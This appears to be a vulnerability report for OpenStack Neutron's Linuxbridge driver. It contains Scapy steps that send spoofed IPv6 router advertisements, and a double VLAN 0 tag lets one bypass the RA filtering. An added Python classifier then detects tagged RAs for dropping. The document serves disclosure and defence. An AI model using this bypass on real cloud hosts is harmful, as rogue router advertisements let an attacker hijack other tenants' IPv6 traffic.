Some high-level repro steps:
Launch 2 Ubuntu 20.04 VMs on the same host (host using Neutron ML2 with the Linuxbridge driver).
On the first VM (victim), run:
~~~~~~~~~~
ip monitor
~~~~~~~~~~
On the second VM (attacker), run:
~~~~~~~~~~
apt update && apt install -y scapy
scapy
~~~~~~~~~~
Send a normal router advertisement; it should be blocked:
~~~~~~~~~~
ra = Ether()
ra /= IPv6(dst='ff02::1')
ra /= ICMPv6ND_RA(chlim=64, prf='High', routerlifetime=1800)
ra /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr('eth0'))
ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64, validlifetime=1810, preferredlifetime=1800)
sendp(ra)
~~~~~~~~~~
Send a router advertisement with VLAN 0 headers; if it goes through, this confirms the issue:
~~~~~~~~~~
ra = Ether()/Dot1Q(vlan=0)/Dot1Q(vlan=0)
ra /= IPv6(dst='ff02::1')
ra /= ICMPv6ND_RA(chlim=64, prf='High', routerlifetime=1800)
ra /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr('eth0'))
ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64, validlifetime=1810, preferredlifetime=1800)
sendp(ra)
~~~~~~~~~~
Please also check OVS; I haven't looked at it.
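
A defender-side check for the condition these steps exercise, as an added example that is not part of the original report or of Neutron's code: it classifies a frame as a router advertisement only after skipping any stacked 802.1Q/802.1ad tags (VLAN 0 priority tags included), so the tagged and untagged frames from the steps above get the same verdict. The function names, the drop policy and the sample frames are constructed for illustration.

```python
import struct

ETH_IPV6 = 0x86DD
VLAN_TPIDS = {0x8100, 0x88A8}    # 802.1Q and 802.1ad tag protocol identifiers
ICMPV6 = 58
ROUTER_ADVERTISEMENT = 134
EXT_HEADERS = {0, 43, 60}        # hop-by-hop, routing, destination options

def classify_frame(frame: bytes) -> dict:
    """Walk past stacked VLAN tags and IPv6 extension headers, then test for an RA."""
    result = {"vlan_ids": [], "is_ra": False}
    if len(frame) < 14:
        return result
    (ethertype,) = struct.unpack_from("!H", frame, 12)
    offset = 14
    while ethertype in VLAN_TPIDS:            # one iteration per tag, VLAN 0 included
        if len(frame) < offset + 4:
            return result
        tci, ethertype = struct.unpack_from("!HH", frame, offset)
        result["vlan_ids"].append(tci & 0x0FFF)
        offset += 4
    if ethertype != ETH_IPV6 or len(frame) < offset + 40:
        return result
    next_header = frame[offset + 6]
    offset += 40
    while next_header in EXT_HEADERS:
        if len(frame) < offset + 2:
            return result
        next_header, hdr_len = frame[offset], frame[offset + 1]
        offset += (hdr_len + 1) * 8           # length is in 8-octet units minus one
    if next_header == ICMPV6 and len(frame) > offset:
        result["is_ra"] = frame[offset] == ROUTER_ADVERTISEMENT
    return result

def should_drop(frame: bytes) -> bool:
    """Assumed policy for an instance port: drop every RA, tagged or not."""
    return classify_frame(frame)["is_ra"]

def build_sample(tags: int, icmp_type: int) -> bytes:
    """Constructed test frame: Ethernet, `tags` VLAN-0 tags, IPv6, ICMPv6 header."""
    eth = bytes.fromhex("333300000001") + bytes.fromhex("020000000002")
    vlan = b"".join(struct.pack("!HH", 0x8100, 0) for _ in range(tags))
    icmp = bytes([icmp_type, 0, 0, 0]) + bytes(12)
    ipv6 = struct.pack("!IHBB", 0x60000000, len(icmp), ICMPV6, 255) + bytes(32)
    return eth + vlan + struct.pack("!H", ETH_IPV6) + ipv6 + icmp
```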